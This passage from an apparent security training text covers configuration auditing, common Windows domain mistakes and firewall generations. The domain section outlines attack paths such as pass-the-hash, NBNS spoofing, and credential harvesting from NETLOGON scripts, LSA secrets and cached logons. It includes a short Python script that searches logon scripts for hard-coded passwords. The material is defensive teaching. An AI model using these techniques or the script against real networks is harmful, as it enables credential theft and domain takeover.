  • 11. 183 | P a g e Now that you have the GPO imported into the SCM tool you can use the “compare” to see the differences between this and the other baselines. How to compare Baseline setting in the Security Compliance Manager tool Simply select the policy you want to compare on the left hand column and then select the “Compare” option on the right hand side (see image below).
  • 12. 184 | P a g e Now select the Baseline policy you want to do the comparison with and press OK.
  • 13. 185 | P a g e The result is a reporting showing the setting and values that are different between the two policies.
  • 14. 186 | P a g e The values tab will show you all the common settings between the policies that have different values and the other tab will show you all the settings that are uniquely configured in either policy.
  • 15. 187 | P a g e Auditing to verify security in practice How to avoid risk from inconsistent network and security configuration practices? Regulations define specific traffic and firewall policies that must be deployed, monitored, audited, and enforced. Unfortunately, due to the silos organizations often lack the ability to seamlessly assess when a network configuration allows traffic that is "out of policy" per compliance, corporate mandate, or industry best practice. Configuration Audit: Configuration Audit tools provide automated collection, monitoring, and audit of configuration across an organization's switches, routers, firewalls, and IDS/IPS. Through a unique ability to normalize multi-vendor device configuration, provides a detailed and intuitive assessment of how devices are configured, including defined firewall rules, security policy, and network hierarchy. These solutions maintain a history of configuration changes, audit configuration rules on a device, and compare this across devices. Intelligently integrated with network activity data, device configuration data is instrumental in building an enterprise-wide representation of a networks topology. This topology mapping helps an organization to understand allowed and
  • 16. 188 | P a g e denied activity across the entire network, resulting in improved consistency of device configuration and flagged configuration changes that introduce risk to the network. Configuration Auditing Solution Vary To the following types: 1. Configuration Management Software – Usually provides a comparison between two configuration sets and also a comparison a specific compliance template 2. Configuration Analyzers – Mostly common in analyzing Firewall configurations known as “Firewall Analyzer” and “Firewall Configuration Analyzer” 3. Local Security Compliance Scanners – Tools such as “MBSA” Microsoft Baseline Security Analyzer tools provide local system configuration analysis 4. Vulnerability Assessment Products – aka “Security Scanners” Vulnerability scanners can be used to audit the settings and configuration of operating systems, applications, databases and network devices. Unlike vulnerability testing, an audit policy is used to check various values to ensure that they are configured to the correct policy. Example policies for auditing include password complexity, ensuring the logging is enabled and testing that anti- virus software is installed properly. Audit policies of common vulnerability scanners have been certified by the US Government or Center for Internet Security to ensure that the auditing tool accurately tests for best practice and required configuration settings. When combined with vulnerability scanning and real-time monitoring with the auditing tools offer some powerful features such as:  Detecting system change events in real-time and then performing a configuration audit  Ensuring that logging is configured correctly for Windows and Unix hosts  Auditing the configuration of a web application's operating system, application and SQL database Audit policies may also be deployed to search for documents that contain sensitive data such as credit card or Social Security numbers. 
A basic tenet of most IT management practices is to minimize variance. Even though your organization may consist of certain types of operating systems and hardware, small changes in drivers, software, security policies, patch updates and sometimes even usage can have dramatic effects on the underlying configuration. As time goes by, these servers and desktop computers can have their configuration drift further away from a "known good" standard, which makes maintaining them more difficult. The following are the most common types of auditing provided by security auditing tools:  Application Auditing Configuration settings of applications such as web servers and anti-virus can be tested against a policy.  Content Auditing Office documents and files can be searched for credit card numbers and other sensitive content.  Database Auditing
  • 17. 189 | P a g e SQL database settings as well as setting so the host operating systems can be tested for compliance.  Operating System Auditing Access control, system hardening, error reporting, security settings and more can be tested against many types of industry and government policies.  Router Auditing Authentication, security and configuration settings can be audited against a policy. Agentless vs. Agent-Based Security Auditing Solutions The chart below provides a high level view of agent-based versus agentless systems; details follow. Solution Characteristic Agentless Agent-Based Asset Discovery Advantage None/Limited Asset Coverage Advantage Limited Audit Comprehensiveness Par Par Target System Impact Advantage Variable Target System Security Advantage Variable Network Impact Variable/Low Low Cost of Deployment Advantage High Cost of Ownership Advantage High Scalability Advantage Limited Functionalities: 1. Asset Discovery: the ability to discover and maintain an accurate inventory of IT assets and applications. Agentless solutions typically have broader discovery capabilities – including both active and passive technologies – that permit them to discover a wider range of assets. This includes discovery of assets that may be unknown to administrators or should not be on your network. 2. Asset Coverage: the breadth of IT assets and applications that can be assessed. Many IT assets that need to be audited simply cannot accept agent software. Examples include network devices like routers and switches, point-of-sale systems, IP phones and many firewalls. 3. Audit Comprehensiveness: the degree of completeness with which the auditing system can assess the target system’s security and compliance status. Using credentialed access, agentless solutions can assess any configuration or data item on the target system, including an analysis of system file integrity (file integrity monitoring). 4. 
Target System Impact: the impact on the stability and performance of the scan target. Agentless solutions use well-defined remote access interfaces to log in and retrieve the desired data, and as a result have a much more benign impact on the stability of the assets being scanned than agent-based systems do.
  • 18. 190 | P a g e
5. Target System Security: the impact of the auditing system on the security of the target system. Agentless auditing solutions are uniquely positioned to conduct objective and trusted security analyses because they do not run on the target system.
6. Network Impact: the impact on the performance of the associated network. Although agentless auditing solutions gather target system configuration information using a network-based remote login, actual network impact is marginal due to bandwidth throttling and overall low usage.
7. Cost of Deployment: the time and effort required to make the auditing system operational. Since there are no agents to install, getting started with agentless solutions is significantly faster than with agent-based solutions – typically hours rather than days or weeks.
8. Cost of Ownership: the time and effort required to update and adjust the configuration of the auditing system. Agentless solutions typically have much lower costs of ownership than agent-based systems; deployment is easier and faster, there are fewer components to update and configuration is centralized on one or two systems.
9. Scalability: the number of target systems that a single instance of the audit system can reliably audit in a typical audit interval. Agentless auditing solutions excel in scalability, which is virtually unlimited – simply increase the number of management servers.
10. Simplified configuration compliance: simplifies configuration compliance with drag-and-drop templates for Windows and Linux operating systems and applications from FDCC, NIST, STIGS, USGCB and Microsoft. Prioritize and manage risk, audit configurations against internal policy or external best practice, and centralize reporting for monitoring and regulatory purposes.
11. Complete configuration assessment: provides a comprehensive view of Windows devices by retrieving software configuration that includes audit settings, security settings, user rights, logging configuration and hardware information including memory, processors, display adapters, storage devices, motherboard details, printers, services, and ports in use.
12. Out-of-the-box configuration auditing: out-of-the-box configuration auditing, reporting, and alerting for common industry guidelines and best practices to keep your network running, available, and accessible.
13. Datasheet configuration auditing: compare assets to industry baselines and best practices to check whether any software or hardware changes were made since the last scan that could impact your security and compliance objectives.
14. Up-to-date baselines: with this module, a complete configuration compliance benchmark library keeps systems up-to-date with industry benchmarks, including changes to benchmarks and adjustments for newer operating systems and applications.
15. Customized best practices: customized best practices for improved policy enforcement and implementation for a broad set of industry templates and standards, including built-in configuration templates for NIST, Microsoft, and more.
  • 19. 191 | P a g e
16. Built-in templates: built-in templates for Windows and Linux operating systems and applications from FDCC, NIST, STIGS, USGCB, and Microsoft.
17. OVAL 5.6 SCAP support
18. Streamlined reporting: streamlined reporting for government and corporate standards with built-in vulnerability reporting.
  • 20. 192 | P a g e Case Studies Summary: Top 10 Mistakes - Managing Windows Networks
“The shoemaker's son always goes barefoot”
 Network Administrators who use Windows XP, or Windows 7 without UAC, on their own computers
 Network Administrators who have a weak password for a local administrator account on their machine
o An example from a real client: Zorik:12345
 Network Administrators whose computers are excluded from security scans
 Network Administrators whose computers lack security patches
 Network Administrators whose computers don’t have an Anti-Virus
 Network Administrators with unencrypted laptops
Domain Administrators on the Users VLAN
 In most organizations administrators and users are connected to the same VLAN
 In this case, a user/attacker can:
o Attack the administrators’ computers using NetBIOS brute force
o Spoof the NetBIOS name of a local server and attack using an NBNS race-condition name spoofing
o Take over the network traffic using a variety of Layer 2 attacks and:
 Replace/infect EXE files that will execute with network administrator privileges
 Steal passwords & hashes of Domain Administrators
 Execute Man-in-the-Middle attacks on encrypted connections (RDP, SSH, SSL)
  • 21. 193 | P a g e Domain Administrator with a Weak Password
  • 22. 194 | P a g e Domain Administrator without the Conficker Patch (MS08-067)
  • 23. 195 | P a g e (LM and NTLM v1) vs. (NTLM v2)
 Once the hash of a network administrator is sent over the network, his identity can be stolen:
o The hash can be used in a Pass-the-Hash attack
o The hash can be broken via Dictionary, Hybrid, Brute Force or Rainbow Tables attacks
  • 24. 196 | P a g e
  • 25. 197 | P a g e Pass the Hash Attack
  • 26. 198 | P a g e Daily logon as a Domain Administrator
1. Is there an entity among men which answers the definition “God”? (Obviously no…)
a. Computers shouldn’t have one either (refers to the “Domain Administrator” default privilege level)
b. Isn’t a network administrator a normal user when he connects to his machine?
c. Doesn’t the network administrator surf the internet?
d. Doesn’t he visit Facebook?
e. Doesn’t he receive emails and open them?
f. Doesn’t he download and install applications?
g. Can’t the application he downloaded contain malware/a virus?
h. What can a virus do running under Domain Administrator privileges?
i. What is the potential damage to data, confidentiality and operability in costs?
Using Domain Administrator for Services
 Why does MSSQL “require” Domain Administrator privileges? (It doesn’t…)
 When a password is assigned to a service, the raw data of the password is stored locally and can be extracted by a remote user with a local administrative account
 The scenario of a service actually requiring Domain Administrator privileges is extremely rare (it almost doesn’t exist) and is mostly a wrong analysis of the real requirements, or laziness, by the decision maker
  • 27. 199 | P a g e
 In the most common case where a service requires an account which is different from SYSTEM, it only requires a local/domain user with only LOCAL administrative privileges
 In the cases where a network manager or a service requires “the highest privileges”, they only require local administrator on clients and/or operational servers, but not the Domain Administrator privilege (which has login privileges to the domain controllers, DNS servers, backup servers, and most of today’s enterprise applications which integrate into Active Directory)
Managing the network with Local Administrator Accounts
 In most cases the operational requirement is:
o The ability to install software on servers and client endpoint machines
o Connecting remotely to machines via C$ (NetBIOS) and Remote Registry
o Executing remote network scanning
 It is possible to execute 99% of the tasks using Separation of Duties, assigning each privilege to a dedicated user/account:
o Users_Administrator_Group – Local Administrators
o Servers_Administrators_Group – Local Administrators
o Change Password Privilege
The NetLogon Folder
 Improper use of the NETLOGON folder is the classic way to get Domain Administrator privileges for the long term
 The most common cases are:
o Administrative logon scripts with clear-text passwords of domain administrator accounts or of the local administrator account on all machines
o Free write/modify permission on the directory
 A logical problem, completely unnoticed, almost undetectable
 The longer the organization’s IT systems exist, the more “treasures” there are to discover
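Finding the "treasures" described above can be partly automated. The following is a minimal sketch that greps logon scripts in a NETLOGON folder for patterns that commonly betray hard-coded credentials; the function name, file extensions and patterns are illustrative choices, not an exhaustive audit.

```python
import re
from pathlib import Path

# Patterns that commonly betray hard-coded credentials in logon scripts
# (net use with /user:, password assignments, runas). Illustrative only.
SUSPICIOUS = [
    re.compile(r"net\s+use\s+\S+\s+\S+\s+/user:", re.IGNORECASE),
    re.compile(r"password\s*[=:]\s*\S+", re.IGNORECASE),
    re.compile(r"runas\s+/user:", re.IGNORECASE),
]

def scan_netlogon(folder: Path) -> list[tuple[str, int, str]]:
    """Return (file name, line number, line) for every suspicious line
    found in script files under the given NETLOGON folder copy."""
    hits = []
    for path in folder.rglob("*"):
        if path.suffix.lower() not in {".bat", ".cmd", ".kix", ".vbs", ".ps1"}:
            continue
        for lineno, line in enumerate(path.read_text(errors="ignore").splitlines(), 1):
            if any(p.search(line) for p in SUSPICIOUS):
                hits.append((path.name, lineno, line.strip()))
    return hits
```

Pointing this at a copy of \\domain\NETLOGON would flag lines like `net use z: \\srv\share /user:admin Secret1`, the exact pattern behind the test.kix and addgroup.cmd examples that follow.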
  • 28. 200 | P a g e The NetLogon Folder - test.kix – Revealing the Citrix UI Password The NetLogon Folder - addgroup.cmd – Revealing the local Administrator of THE ENTIRE NETWORK
  • 29. 201 | P a g e The NetLogon Folder - password.txt – it can’t get any better for a hacker
LSA Secrets & Protected Storage
 The Windows operating system implements an API to work securely with passwords
 The encryption keys are stored on the system and the encrypted data is stored in the registry, e.g. for:
o Internet Explorer
o NetBIOS saved passwords
o Windows Service Manager
  • 30. 202 | P a g e LSA Secrets
  • 31. 203 | P a g e
  • 32. 204 | P a g e Protected Storage
  • 33. 205 | P a g e Wireless Passwords
Cached Logons
 A user at home, unplugged from the organizational internal network and trying to log in to his laptop, cannot log into the domain
 Therefore, the network logon is simulated:
o The hash of the user’s password is saved on his machine
o When the user inputs his password, it is converted into a hash and compared to the list of saved hashes; if a match is found, the system logs the user in
 The vulnerability: the default setting in Windows is to locally save the hashes of the last 10 unique/different passwords used to connect to this machine
 In most cases, the hash of a domain-administrator-privileged account is on that list
  • 34. 206 | P a g e
 Most organizations don’t distinguish between PCs, servers and laptops when it comes to the settings for this feature
 Most organizations don’t harden:
o The local PCs’ cached logons amount to 0
o The laptops’ cached logons amount to 1
o The servers’ to 0 (unless mission critical, then 1 to 3 are recommended)
 It means that at least 50% of the machines contain a domain administrator’s hash and can be used to take over the entire network
 Conclusion: a user/attacker with local administrator privileges can get a domain administrator account from most of the organization’s computers
Password History
 In order to prevent users from recycling their passwords, on every forced password change the system saves the password hashes locally
 By default, the last 24 passwords are saved on the machine
 An attacker with local administrator privileges on the machine gets all the “password patterns” of all the user accounts that ever logged into this machine
 A computer which was used by only 2 people will contain up to 48 different passwords
 Some of these passwords are usually used for other accounts in the organization
Users as Local Administrators
 When a user is logged on with local administrator privileges, the local system’s entire integrity is at risk
 He can install privileged software and drivers, such as promiscuous network drivers for advanced network and Man-in-the-Middle attacks, and rootkits
 He is able to extract the hashes of all the old passwords of the users who ever logged into the current machine
 He is able to extract the hashes of all the CURRENT passwords of the users who ever logged into the current machine
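The cached-logon mechanism and the hardening recommendation above can be sketched as a bounded list of hashes, newest first. This is an illustrative model only: Windows actually stores MSCACHEv2/DCC2 values derived from the NT hash, and the `CachedLogons` class below is hypothetical.

```python
import hashlib

def cache_hash(password: str) -> str:
    """Illustrative digest; Windows really stores MSCACHEv2 (DCC2) values."""
    return hashlib.sha256(password.encode("utf-16-le")).hexdigest()

class CachedLogons:
    """Keeps hashes of the last `limit` unique domain passwords so a
    disconnected machine can still authenticate (Windows defaults to 10)."""
    def __init__(self, limit: int = 10):
        self.limit = limit
        self._hashes: list[str] = []   # newest first

    def record_domain_logon(self, password: str) -> None:
        h = cache_hash(password)
        if h in self._hashes:
            self._hashes.remove(h)
        self._hashes.insert(0, h)
        del self._hashes[self.limit:]  # oldest entries fall off the list

    def offline_logon(self, password: str) -> bool:
        return cache_hash(password) in self._hashes

cache = CachedLogons(limit=10)
cache.record_domain_logon("User-Pass-1!")
cache.record_domain_logon("DomAdmin-Pass-9!")   # an admin once logged on here
print(cache.offline_logon("User-Pass-1!"))      # True - offline login still works
```

Hardening a laptop to `limit=1` means only the most recent user's hash survives, which is exactly why the recommendation above distinguishes PCs, laptops and servers.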
  • 35. 207 | P a g e Forgetting to Harden: RestrictAnonymous=1
Weak Passwords / No Complexity Enforcement
 Weak passwords = a successful brute force
 Complexity-compliant passwords which appear in a passwords dictionary, e.g. “Password1!”
 Old passwords or default passwords of the organization
Guess what the password was? (gma )
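The "complexity-compliant but weak" trap above is easy to demonstrate. The sketch below checks a Windows-style complexity rule and then a dictionary; the policy thresholds and the tiny wordlist are illustrative assumptions, not an actual Windows implementation.

```python
import re

# Tiny illustrative dictionary; real wordlists hold millions of entries.
COMMON_PASSWORDS = {"password1!", "welcome1!", "qwerty123$", "p@ssw0rd"}

def meets_complexity(pw: str) -> bool:
    """Windows-style complexity: length >= 8 and at least three of the
    four character classes (lower, upper, digit, special)."""
    classes = [
        bool(re.search(r"[a-z]", pw)),
        bool(re.search(r"[A-Z]", pw)),
        bool(re.search(r"\d", pw)),
        bool(re.search(r"[^A-Za-z0-9]", pw)),
    ]
    return len(pw) >= 8 and sum(classes) >= 3

def is_strong(pw: str) -> bool:
    """Complexity alone is not enough; reject dictionary entries too."""
    return meets_complexity(pw) and pw.lower() not in COMMON_PASSWORDS

print(meets_complexity("Password1!"))  # True  - passes the policy
print(is_strong("Password1!"))         # False - still a dictionary word
```

This is the whole point of the bullet above: "Password1!" satisfies every complexity checkbox yet falls to the first dictionary pass.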
  • 36. 208 | P a g e Firewalls Understanding Firewalls (1, 2, 3, 4, 5 generations) A firewall is a device or set of devices designed to permit or deny network transmissions based upon a set of rules and is frequently used to protect networks from unauthorized access while permitting legitimate communications to pass. Many personal computer operating systems include software-based firewalls to protect against threats from the public Internet. Many routers that pass data between networks contain firewall components and, conversely, many firewalls can perform basic routing functions. First generation: packet filters The first paper published on firewall technology was in 1988, when engineers from Digital Equipment Corporation (DEC) developed filter systems known as packet filter firewalls. This fairly basic system was the first generation of what became a highly involved and technical internet security feature. At AT&T Bell Labs, Bill Cheswick and Steve Bellovin were continuing their research in packet filtering and developed a working model for their own company based on their original first generation architecture. Packet filters act by inspecting the "packets" which transfer between computers on the Internet. If a packet matches the packet filter's set of rules, the packet filter will drop (silently discard) the packet, or reject it (discard it, and send "error responses" to the source). This type of packet filtering pays no attention to whether a packet is part of an existing stream of traffic (i.e. it stores no information on connection "state"). Instead, it filters each packet based only on information contained in the packet itself (most commonly using a combination of the packet's source and destination address, its protocol, and, for TCP and UDP traffic, the port number). 
TCP and UDP protocols constitute most communication over the Internet, and because TCP and UDP traffic by convention uses well known ports for particular types of traffic, a "stateless" packet filter can distinguish between, and thus control, those types of traffic (such as web browsing, remote printing, email transmission, file transfer), unless the machines on each side of the packet filter are both using the same non-standard ports. Packet filtering firewalls work mainly on the first three layers of the OSI reference model, which means most of the work is done between the network and physical layers, with a little bit of peeking into the transport layer to figure out source and destination port numbers.[8] When a packet originates from the sender and filters through a firewall, the device checks for matches to any of the packet filtering rules that are configured in the firewall and drops or rejects the packet accordingly. When the packet passes through the firewall, it filters the packet on a protocol/port number basis (GSS). For example, if a rule in the firewall exists to block telnet access, then the firewall will block the TCP protocol for port number 23.
  • 37. 209 | P a g e Second generation: "stateful" filters
During 1989–1990, three colleagues from AT&T Bell Laboratories, Dave Presetto, Janardan Sharma, and Kshitij Nigam, developed the second generation of firewalls, calling them circuit level firewalls. Second-generation firewalls perform the work of their first-generation predecessors but operate up to layer 4 (transport layer) of the OSI model. They examine each data packet as well as its position within the data stream. Known as stateful packet inspection, this technique records all connections passing through the firewall and determines whether a packet is the start of a new connection, a part of an existing connection, or not part of any connection. Though static rules are still used, these rules can now contain connection state as one of their test criteria. Certain denial-of-service attacks bombard the firewall with thousands of fake connection packets in an attempt to overwhelm it by filling up its connection state memory. Third generation: application layer The key benefit of application layer filtering is that it can "understand" certain applications and protocols (such as File Transfer Protocol, DNS, or web browsing), and it can detect if an unwanted protocol is sneaking through on a non-standard port or if a protocol is being abused in any harmful way. The existing deep packet inspection functionality of modern firewalls can be shared by Intrusion-Prevention Systems (IPS). Currently, the Middlebox Communication Working Group of the Internet Engineering Task Force (IETF) is working on standardizing protocols for managing firewalls and other middleboxes. Another axis of development is the integration of user identity into firewall rules. Many firewalls provide such features by binding user identities to IP or MAC addresses, which is very approximate and can be easily circumvented. The NuFW firewall provides real identity-based firewalling, by requesting the user's signature for each connection. 
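Looking back at the second generation, stateful inspection can be sketched as a connection table consulted before any static rules. The model below is illustrative; note how bounding the table is exactly what the state-exhaustion denial-of-service attack described above targets.

```python
# Minimal sketch of stateful inspection: the firewall remembers which
# connections it has seen, so it can tell a connection-opening packet
# (TCP SYN) from a packet that claims to belong to an existing stream.

class StatefulFirewall:
    def __init__(self, max_connections: int = 10000):
        # The bounded table is what a SYN-flood DoS attack fills up.
        self.max_connections = max_connections
        self.table: set[tuple] = set()   # (src, sport, dst, dport)

    def inspect(self, src, sport, dst, dport, syn: bool) -> str:
        key = (src, sport, dst, dport)
        if key in self.table:
            return "allow"                        # part of a known connection
        if syn:
            if len(self.table) >= self.max_connections:
                return "drop"                     # state table exhausted
            self.table.add(key)                   # record the new connection
            return "allow"
        return "drop"   # mid-stream packet with no recorded connection

fw = StatefulFirewall()
print(fw.inspect("10.0.0.5", 40000, "1.2.3.4", 80, syn=True))   # allow (new)
print(fw.inspect("10.0.0.5", 40000, "1.2.3.4", 80, syn=False))  # allow (known)
print(fw.inspect("6.6.6.6", 1337, "1.2.3.4", 80, syn=False))    # drop (no state)
```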
Authpf on BSD systems loads firewall rules dynamically per user, after authentication via SSH. Application firewall An application firewall is a form of firewall which controls input, output, and/or access from, to, or by an application or service. It operates by monitoring and potentially blocking the input, output, or system service calls which do not meet the configured policy of the firewall. The application firewall is typically built to control all network traffic on any OSI layer up to the application layer. It is able to control applications or services specifically, unlike a stateful network firewall which is - without additional software - unable to control network traffic regarding a specific application. There are two primary categories of application firewalls, network-based application firewalls and host-based application firewalls.
  • 38. 210 | P a g e Network-based application firewalls A network-based application layer firewall is a computer networking firewall operating at the application layer of a protocol stack; it is also known as a proxy-based or reverse-proxy firewall. Application firewalls specific to a particular kind of network traffic may be titled with the service name, such as a web application firewall. They may be implemented through software running on a host or a stand-alone piece of network hardware. Often, it is a host using various forms of proxy servers to proxy traffic before passing it on to the client or server. Because it acts on the application layer, it may inspect the contents of the traffic, blocking specified content, such as certain websites, viruses, and attempts to exploit known logical flaws in client software. Modern application firewalls may also offload encryption from servers, block application input/output from detected intrusions or malformed communication, manage or consolidate authentication, or block content which violates policies. Host-based application firewalls A host-based application firewall can monitor any application input, output, and/or system service calls made from, to, or by an application. This is done by examining information passed through system calls instead of, or in addition to, a network stack. A host-based application firewall can only provide protection to the applications running on the same host. Application firewalls function by determining whether a process should accept any given connection. They accomplish this by hooking into socket calls to filter the connections between the application layer and the lower layers of the OSI model. Application firewalls that hook into socket calls are also referred to as socket filters. 
Application firewalls work much like a packet filter, but application filters apply filtering rules (allow/block) on a per-process basis instead of filtering connections on a per-port basis. Generally, prompts are used to define rules for processes that have not yet received a connection. It is rare to find application firewalls not combined or used in conjunction with a packet filter. Also, application firewalls further filter connections by examining the process ID of data packets against a ruleset for the local process involved in the data transmission. The extent of the filtering that occurs is defined by the provided ruleset. Given the variety of software that exists, application firewalls only have more complex rule sets for the standard services, such as sharing services. These per-process rule sets have limited efficacy in filtering every possible association that may occur with other processes. Also, these per-process rule sets cannot defend against modification of the process via exploitation, such as memory corruption exploits. Because of these limitations, application firewalls are beginning to be supplanted by a new generation of application firewalls that rely on mandatory access control (MAC), also referred to as sandboxing, to protect vulnerable services. Examples of next-generation host-based application firewalls which control system service calls by an application are AppArmor and the TrustedBSD MAC framework (sandboxing) in Mac OS X. Host-based application firewalls may also provide network-based application firewalling.
  • 39. 211 | P a g e Distributed web application firewalls A Distributed Web Application Firewall (also called a dWAF) is a member of the web application firewall (WAF) and web application security family of technologies. Purely software-based, the dWAF architecture is designed as separate components able to physically exist in different areas of the network. This advance in architecture allows the resource consumption of the dWAF to be spread across a network rather than depend on one appliance, while allowing complete freedom to scale as needed. In particular, it allows the addition / subtraction of any number of components independently of each other for better resource management. This approach is ideal for large and distributed virtualized infrastructures such as private, public or hybrid cloud models. Cloud-based web application firewalls A cloud-based Web Application Firewall is also a member of the web application firewall (WAF) and web application security family of technologies. This technology is unique due to the fact that it is platform agnostic and does not require any hardware or software changes on the host, just a DNS change. By applying this DNS change, all web traffic is routed through the WAF, where it is inspected and threats are thwarted. Cloud-based WAFs are typically centrally orchestrated, which means that threat detection information is shared among all the tenants of the service. This collaboration results in improved detection rates and lower false positives. Like other cloud-based solutions, this technology is elastic, scalable and is typically offered as a pay-as-you-grow service. This approach is ideal for cloud-based web applications and small or medium sized websites that require web application security but are not willing or able to make software or hardware changes to their systems.  In 2010, Imperva spun out Incapsula to provide a cloud-based WAF for small to medium sized businesses. 
 Since 2011, United Security Providers has provided the Secure Entry Server as an Amazon EC2 cloud-based Web Application Firewall
 Akamai Technologies offers a cloud-based WAF that incorporates advanced features such as rate control and custom rules, enabling it to address both layer 7 and DDoS attacks.
The Common Firewall’s Limits
1. The common firewall works on ACL rules, where something is allowed or denied based on a simple set of parameters such as Source IP, Destination IP, Source Port and Destination Port.
2. Most firewalls don’t support application-level rules that would allow the creation of smart rules matching today’s more active, application-rich technology world.
3. Every hacker knows that 99.9% of the firewalls on planet earth are configured to allow connections to remote machines at TCP port 80, since this is the port of the “WEB”, used by HTTP.
4. Today’s firewalls will allow any kind of traffic to leave the organization on port 80, this means that:
  • 40. 212 | P a g e
 Hackers can use “network tunneling” technology to transfer ANY kind of information over port 80 and therefore bypass all of the currently deployed firewalls
 In terms of traffic and content going through a port defined to be open, such as port 80, firewalls are configured to act as a blacklist; therefore tunneling an ENCRYPTED connection such as SSL or SSH over port 80 will bypass all of the firewall’s potential inspection features.
 The problem gets worse when ports that allow encrypted connections are commonly available, such as port 443, which supports the encrypted HTTPS protocol. Hackers can tunnel any communication over port 443 and encrypt it with HTTPS to imitate the behavior of any standard browser.
 The firewalls which do inspect SSL traffic rely on the assumption that they can generate and sign a certificate of their own for the browsed domain and that the browser will accept it, since they are defined on the machine as a trusted Certificate Authority. However, as firewalls work mostly in blacklist mode, they will still forward any traffic that they fail to open and inspect.
Implementing Application Aware Firewalls Features
Palo Alto Networks has built a next-generation firewall with several innovative technologies enabling organizations to fix the firewall. These technologies bring business-relevant elements (applications, users, and content) under policy control on a high-performance firewall architecture. This technology runs on a high-performance, purpose-built platform based on Palo Alto Networks' Single-Pass Parallel Processing (SP3) Architecture. Unique to the SP3 Architecture, traffic is only examined once, using hardware with dedicated processing resources for security, networking, content scanning and management to provide line-rate, low-latency performance under load.
Application Traffic Classification
Accurate traffic classification is the heart of any firewall, with the result becoming the basis of the security policy. 
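The port-80 tunneling bypass described above comes down to one gap: port-based classification versus payload inspection. The sketch below contrasts the two; the classifier functions and the signature bytes are illustrative simplifications.

```python
def classify_by_port(dst_port: int) -> str:
    """What a traditional firewall 'knows': port 80 must be the web."""
    return {80: "http", 443: "https", 22: "ssh"}.get(dst_port, "unknown")

def classify_by_payload(first_bytes: bytes) -> str:
    """A peek at the first bytes of the stream tells a different story."""
    if first_bytes.startswith(b"SSH-2.0"):
        return "ssh"
    if first_bytes.split(b" ")[0] in (b"GET", b"POST", b"HEAD", b"PUT"):
        return "http"
    return "unknown"

# An SSH session tunneled over port 80 looks like web traffic to a
# port-based firewall but not to payload inspection:
print(classify_by_port(80))                          # http
print(classify_by_payload(b"SSH-2.0-OpenSSH_8.9"))   # ssh
```

Once the tunnel is itself encrypted (SSL over 80 or 443), even payload inspection fails unless the firewall can decrypt, which is the motivation for the SSL-inspection and application-identification features discussed next.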
Traditional firewalls classify traffic by port and protocol, which, at one point, was a satisfactory mechanism for securing the perimeter. Today, applications can easily bypass a port-based firewall: hopping ports, using SSL and SSH, sneaking across port 80, or using non-standard ports. App-ID™, a patent-pending traffic classification mechanism that is unique to Palo Alto Networks, addresses the traffic classification limitations that plague traditional firewalls by applying multiple classification mechanisms to the
  • 41. 213 | P a g e traffic stream, as soon as the device sees it, to determine the exact identity of applications traversing the network. Classify traffic based on applications, not ports. App-ID uses multiple identification mechanisms to determine the exact identity of applications traversing the network. The identification mechanisms are applied in the following manner:  Traffic is first classified based on the IP address and port.  Signatures are then applied to the allowed traffic to identify the application based on unique application properties and related transaction characteristics.  If App-ID determines that encryption (SSL or SSH) is in use and a decryption policy is in place, the application is decrypted and application signatures are applied again on the decrypted flow.  Decoders for known protocols are then used to apply additional context-based signatures to detect other applications that may be tunneling inside of the protocol (e.g., Yahoo! Instant Messenger used across HTTP).  For applications that are particularly evasive and cannot be identified through advanced signature and protocol analysis, heuristics or behavioral analysis may be used to determine the identity of the application. As the applications are identified by the successive mechanisms, the policy check determines how to treat the applications and associated functions: block them, or allow them and scan for threats, inspect for unauthorized file transfer and data patterns, or shape using QoS.
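The successive mechanisms listed above can be caricatured as a short pipeline: signatures first, then decryption and re-classification, then protocol decoders looking for tunneled applications. This is a hypothetical sketch in the spirit of those steps; the signature bytes and function names are illustrative and do not reflect Palo Alto Networks' actual implementation.

```python
# Toy signature table: first bytes of a flow -> application name.
SIGNATURES = {b"SSH-2.0": "ssh", b"GET ": "web-browsing", b"\x16\x03": "ssl"}

def match_signature(data: bytes, default: str = "unknown") -> str:
    return next((app for sig, app in SIGNATURES.items()
                 if data.startswith(sig)), default)

def classify(payload: bytes, decrypt=None) -> str:
    app = match_signature(payload)             # signatures on the raw flow
    if app == "ssl" and decrypt is not None:   # decryption policy in place:
        app = match_signature(decrypt(payload), "ssl")  # re-apply signatures
    if app == "web-browsing":                  # protocol decoder: look inside
        parts = payload.split(b"\r\n\r\n", 1)  # HTTP for a tunneled app
        if len(parts) == 2:
            tunneled = match_signature(parts[1])
            if tunneled != "unknown":
                app = tunneled
    return app

print(classify(b"SSH-2.0-OpenSSH"))                        # ssh
print(classify(b"GET / HTTP/1.1\r\n\r\nSSH-2.0-tunnel"))   # ssh (tunneled)
```

The real system adds heuristics for evasive applications and keeps re-evaluating the flow midstream; the sketch only shows why applying the mechanisms in succession catches traffic that any single check would miss.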
  • 42. 214 | P a g e Always on, always the first action taken across all ports.
Classifying traffic with App-ID is always the first action taken when traffic hits the firewall, which means that all App-IDs are always enabled, by default. There is no need to enable a series of signatures to look for an application that is thought to be on the network; App-ID is always classifying all of the traffic, across all ports - not just a subset of the traffic (e.g., HTTP). All App-IDs are looking at all of the traffic passing through the device: business applications, consumer applications, network protocols, and everything in between. App-ID continually monitors the state of the application to determine if the application changes midstream, provides the updated information to the administrator in ACC, applies the appropriate policy and logs the information accordingly. Like all firewalls, Palo Alto Networks next-generation firewalls use positive control: all traffic is denied by default, then only those applications that are within the policy are allowed. All else is blocked.
All classification mechanisms, all application versions, all OSes.
App-ID operates at the services layer, monitoring how the application interacts between the client and the server. This means that App-ID is indifferent to new features, and it is client and server operating system agnostic. The result is that a single App-ID for BitTorrent is going to be roughly equal to the many BitTorrent OS and client signatures that need to be enabled to try and control this application in other offerings.
Full visibility and control of custom and internal applications.
Internally developed or custom applications can be managed using either an application override or custom App-IDs. An application override effectively renames the traffic stream to that of the internal application. 
The other mechanism would be to use customizable App-IDs based on context-based signatures for HTTP, HTTPS, FTP, IMAP, SMTP, RTSP, Telnet, and unknown TCP/UDP traffic. Organizations can use either of these mechanisms to exert the same level of control over their internal or custom applications that may be applied to SharePoint, Salesforce.com, or Facebook. Securely Enabling Applications Based on Users & Groups Traditionally, security policies were applied based on IP addresses, but the increasingly dynamic nature of users and applications means that IP addresses alone have become ineffective as a mechanism for monitoring and controlling user activity. Palo Alto Networks next-generation firewalls integrate with a wide range of user repositories and terminal service offerings, enabling organizations to incorporate user and group information into their security policies. Through User-ID, organizations also get full visibility into user activity on the network as well as user-based policy control, log viewing and reporting.
  • 43. 215 | P a g e Transparent use of users and groups for secure application enablement.
